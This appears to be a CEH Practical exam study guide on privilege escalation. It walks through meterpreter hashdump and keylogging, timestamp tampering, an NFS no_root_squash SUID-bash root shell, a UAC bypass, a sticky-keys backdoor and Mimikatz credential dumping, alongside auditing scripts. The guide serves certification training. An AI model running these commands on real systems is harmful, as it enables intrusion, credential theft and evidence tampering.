CEH Practical Guide
2. Privilege Escalation

Privilege Escalation techniques to learn for CEH Practical

Last updated 2 months ago

1. Escalate privileges using Priv Esc tools

After you have a meterpreter session, check which user the session is running as:

getuid

Then use the BeRoot tool to enumerate further attack vectors.

Upload it with meterpreter. Uploads land in the session's current working directory, which is usually the user's Downloads folder (confirm with pwd):

upload beroot.exe

Now run shell and execute the file. It lists the attack vectors it found (writable service binaries, unquoted service paths, AlwaysInstallElevated, exploitable token privileges and more).

Note: Windows token privileges can themselves be used to escalate privileges. The ones to look for are SeDebug, SeRestore and SeBackup, SeTakeOwnership, SeTcb and SeCreateToken, SeLoadDriver, and SeImpersonate and SeAssignPrimaryToken. BeRoot lists every privilege held by the current token and highlights these; you can also check them yourself with whoami /priv. A privilege shown as Disabled is still held by the token and can be enabled by the process, so it counts.
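
The following is an added example, not code from the page or from BeRoot: it parses the output of whoami /priv and reports the privileges from the note above that the token holds, whether enabled or not. The sample output is constructed for the example; on a real host you would feed it the saved output of whoami /priv.

```python
# Added example (not from the page or from BeRoot): parse `whoami /priv` output
# and flag the token privileges the note above lists as escalation vectors.
import re

# Why each privilege matters; the set mirrors the note above.
ESCALATION_PRIVILEGES = {
    "SeDebugPrivilege": "open any process, e.g. inject into or dump LSASS",
    "SeRestorePrivilege": "write any file or registry key regardless of its ACL",
    "SeBackupPrivilege": "read any file regardless of its ACL, e.g. the SAM and SYSTEM hives",
    "SeTakeOwnershipPrivilege": "take ownership of any object, then rewrite its ACL",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "forge a primary token with arbitrary groups",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeImpersonatePrivilege": "impersonate tokens handed to you (Potato-family attacks)",
    "SeAssignPrimaryTokenPrivilege": "start a new process under another token",
}

# Constructed sample of `whoami /priv` output, not taken from a real host.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeBackupPrivilege             Back up files and directories             Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One privilege row: name, free-text description, then Enabled/Disabled.
_ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege: state} for every privilege row in `whoami /priv` output."""
    rows = {}
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            rows[m.group(1)] = m.group(2)
    return rows


def find_escalation_privileges(text):
    """Return sorted (privilege, state, why) for the dangerous privileges the token holds.

    A privilege reported as Disabled is still present in the token; the process
    can turn it on with AdjustTokenPrivileges, so it is reported as well."""
    held = parse_whoami_priv(text)
    return sorted((name, state, ESCALATION_PRIVILEGES[name])
                  for name, state in held.items() if name in ESCALATION_PRIVILEGES)


if __name__ == "__main__":
    for name, state, why in find_escalation_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name:32} {state:9} {why}")
```

Save the real output with whoami /priv > priv.txt, read the file and pass its contents to find_escalation_privileges; the Disabled entries are the ones people tend to overlook.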

Ghostpack Seatbelt

Gather host information with the following commands (-group selects a set of checks, -full prints the results without filtering):

Seatbelt.exe -group=all -full
Seatbelt.exe -group=system
Seatbelt.exe -group=user
Seatbelt.exe -group=misc

Dumping hashes in meterpreter

hashdump needs SYSTEM privileges; if it fails, run getsystem first or background the session and use the post module instead.

hashdump
use post/windows/gather/smart_hashdump
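
The following is an added example, not code from the page or from Metasploit: it parses hashdump output in its user:rid:lm:nt::: format and reports what to look at before cracking anything. The sample lines are constructed; the only real value in them is 8846f7eaee8fb117ad06bdd830b7586c, the well-known NT hash of "password".

```python
# Added example (not from the page or from Metasploit): triage meterpreter
# hashdump output before cracking.
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash stored when LM hashing is off
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# Constructed sample in hashdump's user:rid:lm:nt::: format. Only the
# 8846f7... value is real (NT hash of "password"); the rest is made up.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
raj:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""


def parse_hashdump(text):
    """Return a list of {user, rid, lm, nt} dicts; lines that are not hash rows are skipped."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts


def empty_password_accounts(accounts):
    """Accounts whose NT hash is the empty-password hash: no cracking needed."""
    return [a["user"] for a in accounts if a["nt"] == EMPTY_NT]


def lm_enabled_accounts(accounts):
    """Accounts with a real LM hash stored, i.e. LM hashing is still enabled (trivial to crack)."""
    return [a["user"] for a in accounts if a["lm"] != EMPTY_LM]


def shared_hash_groups(accounts):
    """Map NT hash -> users sharing it. A shared hash is the same password, so one
    crack (or one pass-the-hash) covers every account in the group."""
    groups = defaultdict(list)
    for a in accounts:
        if a["nt"] != EMPTY_NT:
            groups[a["nt"]].append(a["user"])
    return {h: users for h, users in groups.items() if len(users) > 1}


def to_hashcat_lines(accounts):
    """NT hashes in the user:hash form that hashcat -m 1000 --username expects."""
    return [f'{a["user"]}:{a["nt"]}' for a in accounts if a["nt"] != EMPTY_NT]


if __name__ == "__main__":
    accts = parse_hashdump(SAMPLE_HASHDUMP)
    print("empty passwords:", empty_password_accounts(accts))
    print("LM enabled:", lm_enabled_accounts(accts))
    print("shared hashes:", shared_hash_groups(accts))
    print("\n".join(to_hashcat_lines(accts)))
```

Paste the hashdump output into a file and pass its contents to parse_hashdump; the shared-hash groups are usually the fastest way to lateral movement because a hash that cracks once opens every account in the group.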

2. Post exploitation using Meterpreter

Useful commands

sysinfo           // OS, architecture, hostname
getuid            // user the session runs as
ifconfig          // network interfaces of the victim
pwd               // current directory (usually the user's Downloads folder)
ls
cat
cd
keyscan_start     // start the keylogger
keyscan_dump      // read what the keylogger has captured so far
idletime          // how long the user has been idle; run noisy actions when it is high

To modify the timestamp MACE (modified, accessed, created, entry-modified) attributes of a file, for example its modification time:

timestomp secret.ext -m "2/11/2022 8:10:03"

To view the timestamp entries:

timestomp secret.ext -v

Flags: -m modified, -a accessed, -c created, -e entry modified (the time the file's MFT record itself last changed). -z sets all four at once and -f <file> copies them from another file.

Caveat: timestomp only rewrites the $STANDARD_INFORMATION timestamps; the copy kept in the $FILE_NAME attribute is untouched, and forensic tools compare the two to spot timestomping.

Finding files in meterpreter

search -f flag*.txt (in meterpreter)

Hidden files in shell

First get the shell, then use the following command.

dir /a:h

List all services in shell

sc queryex type= service state= all

Note the space after each = sign; sc requires it.

Other shell commands

netsh firewall show state                          // firewall state (legacy command; on current Windows use netsh advfirewall show allprofiles)
netsh firewall show config
wmic cpu get                                       // CPU details
wmic /node:"" product get name,version,vendor      // installed software; put the target host name inside the quotes, or omit /node for the local machine
wmic useraccount get name,sid                      // local users and their SIDs
wmic os where Primary='TRUE' reboot                // restarts the system, so only run it when you mean to

wmic is deprecated and may be missing on recent Windows 11 builds; Get-CimInstance in PowerShell gives the same information.

3. Linux privilege esc with pkexec

CVE-2021-4034 (PwnKit)

Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission). pkexec is a setuid-root binary, and versions before polkit 0.120 mishandle an empty argument list, which lets any local user obtain a root shell.

Check before trying it:

pkexec --version        // vulnerable if below 0.120, unless the distro backported the fix
ls -l $(which pkexec)   // must be setuid root (-rwsr-xr-x ... root root)

Download the exploit from the berdav/CVE-2021-4034 repository linked at the end of this page, build it with make and run the resulting binary; if the host is vulnerable you get a root shell.

4. Linux priv esc with NFS misconfiguration

Configure NFS in Victim

sudo apt install nfs-kernel-server

Open the /etc/exports file. It lists the directories exported to the network. Add the following entry:

/home    *(rw,no_root_squash)

This exports /home to every host (*) read/write, and no_root_squash disables the default root_squash mapping, so a client's root user is treated as root on the server as well. That combination is the misconfiguration.

Restart (or re-export) the server:

sudo /etc/init.d/nfs-kernel-server restart   // or: sudo systemctl restart nfs-kernel-server, or sudo exportfs -ra

If we run an nmap scan now, port 2049 (nfs) will appear as open, together with 111 (rpcbind).

In Attacking Machine

Install the NFS client tools (the package is nfs-common):

sudo apt install nfs-common

List the exported shares:

showmount -e 192.168.18.110

Now mount the share:

mkdir /tmp/nfs
sudo mount -t nfs 192.168.18.110:/home /tmp/nfs

Move into the mount and plant a root-owned SUID copy of bash. Do the copy and the chmod as root: because of no_root_squash, files created by root on the client are owned by root on the server, and the setuid bit only helps if the owner is root.

cd /tmp/nfs
sudo cp /bin/bash .
sudo chmod +s bash   // sets the setuid/setgid bits, so the binary runs with its owner's (root's) identity
ls -la bash          // expect -rwsr-sr-x 1 root root ...

df -h also lists the mounted share alongside the other file systems, which is a quick way to confirm the mount:

df -h

Now ssh into the victim as the low-privileged user, move to the shared directory and run the planted bash with -p (without -p, bash drops the effective uid back to the real uid), and we get the root shell:

cd /home
./bash -p

Caveat: the copied bash comes from the attacking machine, so it must match the victim's architecture and shared libraries. If it fails to start, use a statically linked bash, or copy the victim's own /bin/bash into the share over ssh and then, from the attacking machine, run sudo chown root:root and sudo chmod +s on it over the mount.
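
The following is an added example, not code from the page or from any NFS tool: it parses an /etc/exports file and reports the option combinations that make the attack above possible, so you can audit a server (or check an export you have enumerated) without mounting anything. The sample file content is constructed for the example.

```python
# Added example (not from the page or from any NFS tool): find the exports
# that allow the SUID-planting attack described above.
import re

# Constructed sample /etc/exports, not taken from a real host.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/home           *(rw,no_root_squash)
/srv/backup     10.0.0.0/24(rw,sync,root_squash) admin.lab(rw,no_root_squash)
/var/www        192.168.1.0/24(ro)
/export/anyone  *
"""

# client spec: optional host part, optional "(opt,opt,...)" part
_SPEC = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return (path, client, options) tuples, one per client on each export line.

    A client with no parenthesised options gets the exportfs defaults, which are
    ro and root_squash; that is modelled as an empty option set. Comments and
    blank lines are skipped. Quoted paths with spaces and backslash line
    continuations are not handled by this simplified parser."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients:
            m = _SPEC.match(spec)
            if not m:
                raise ValueError(f"unparseable client spec {spec!r} for {path}")
            client = m.group(1) or "*"          # "(rw)" with no host means every host
            options = {o for o in (m.group(2) or "").split(",") if o}
            entries.append((path, client, options))
    return entries


def audit_exports(text):
    """Return (path, client, severity, reason) for each risky export entry.

    The attack above needs all three of: a client spec the attacker matches
    ('*' here), rw so the SUID binary can be written, and no_root_squash so a
    file created by the client's root stays owned by uid 0 on the server."""
    findings = []
    for path, client, opts in parse_exports(text):
        if "no_root_squash" in opts and "rw" in opts and client == "*":
            findings.append((path, client, "CRITICAL",
                             "rw + no_root_squash exported to every host: anyone can plant a root SUID binary"))
        elif "no_root_squash" in opts and "rw" in opts:
            findings.append((path, client, "HIGH",
                             "rw + no_root_squash: root on this client is root on the share"))
        elif "no_root_squash" in opts:
            findings.append((path, client, "MEDIUM",
                             "no_root_squash on a read-only export: client root can read root-only files"))
        elif client == "*":
            findings.append((path, client, "LOW",
                             "exported to every host (read-only with root_squash by default)"))
    return findings


if __name__ == "__main__":
    for path, client, severity, reason in audit_exports(SAMPLE_EXPORTS):
        print(f"{severity:8} {path} -> {client}: {reason}")
```

Run it against a copy of the victim's /etc/exports, or against lines reconstructed from showmount -e; the CRITICAL case is exactly the /home entry used in the walkthrough, and the fix is to drop no_root_squash and replace * with the hosts that actually need the share.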

Useful commands post exploitation

id
whoami
cat /etc/crontab; ls -la /etc/cron.d        // scheduled jobs (there is no /etc/cronjobs file)
find / -name "*.txt" -ls 2>/dev/null         // list all text files on the system; quote the glob so the shell does not expand it
route -n                                     // routing table with numeric addresses instead of resolved host/network names

From the root shell obtained above you can simply cat /etc/shadow. If you want a root-capable editor instead, copy nano into the share the same way as bash (as root, with the setuid bit) and open the shadow file with it:

sudo cp /bin/nano .
sudo chmod +s nano
./nano /etc/shadow    // nano does not drop privileges, so no -p flag is needed

To see running processes

ps -ef

To list SUID binaries (the same class of file you just planted)

find / -perm -4000 -type f -ls 2>/dev/null

5. Escalate privileges bypassing UAC and sticky keys

A meterpreter session obtained as a member of the local Administrators group runs at medium integrity (UAC-filtered), so getsystem fails until UAC is bypassed. Background the session and use the following exploit, setting SESSION to the backgrounded session. It abuses fodhelper.exe, an auto-elevating binary, so it only works for members of the Administrators group, not for standard users.

use exploit/windows/local/bypassuac_fodhelper

Once you get the new high-integrity meterpreter session, escalate to SYSTEM with named-pipe impersonation (technique 1):

getsystem -t 1

To list the current sessions and switch to one of them:

sessions -l
sessions -i <id>

Using sticky keys to priv esc on Win 11

After the initial meterpreter session has been elevated, use the following post module. It registers cmd.exe as the Image File Execution Options debugger for sethc.exe, so the sticky keys hotkey launches a command prompt instead.

use post/windows/manage/sticky_keys

Set SESSION to the already privilege-escalated session and run it.

Now on Windows 11, go to the logon screen (or sign in as a normal user) and press Shift five times; the cmd.exe that appears runs as the process that handled the hotkey, which at the logon screen is SYSTEM.

6. Priv esc using Mimikatz

Metasploit has a built-in Mimikatz extension for meterpreter called kiwi.

First get a meterpreter session and escalate privileges using bypassuac and getsystem. kiwi needs SYSTEM, and the meterpreter architecture must match the target (an x64 payload on x64 Windows).

In meterpreter load the extension:

load kiwi
help kiwi    // list the kiwi commands

To dump the local SAM hashes:

lsa_dump_sam

We can also dump the LSA secrets. LSA secrets are part of the local security policy store and may contain service account passwords, auto-logon passwords, cached credentials and similar:

lsa_dump_secrets

Change a user's password with kiwi, either with the current password or with its NTLM hash, without knowing the original password:

password_change -u raj -p 123 -P 9876
password_change -u raj -n <NTLM-hash> -P 1234

Caveat: password_change really changes the password, which locks the legitimate user out and is easy to notice; in an engagement, prefer pass-the-hash with the dumped NTLM hash.
Useful links

AlessandroZ/BeRoot: Privilege Escalation Project - Windows / Linux / Mac (GitHub)
Linux Privilege Escalation full course
GhostPack/Seatbelt: a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives (GitHub)
berdav/CVE-2021-4034: CVE-2021-4034 1-day exploit (GitHub)
Linux Privilege Escalation using Misconfigured NFS (Hacking Articles), an excellent tutorial
Certified Ethical Hacker (CEHv12) Practical hands-on Labs (Udemy)
CEH Practical Preparation Course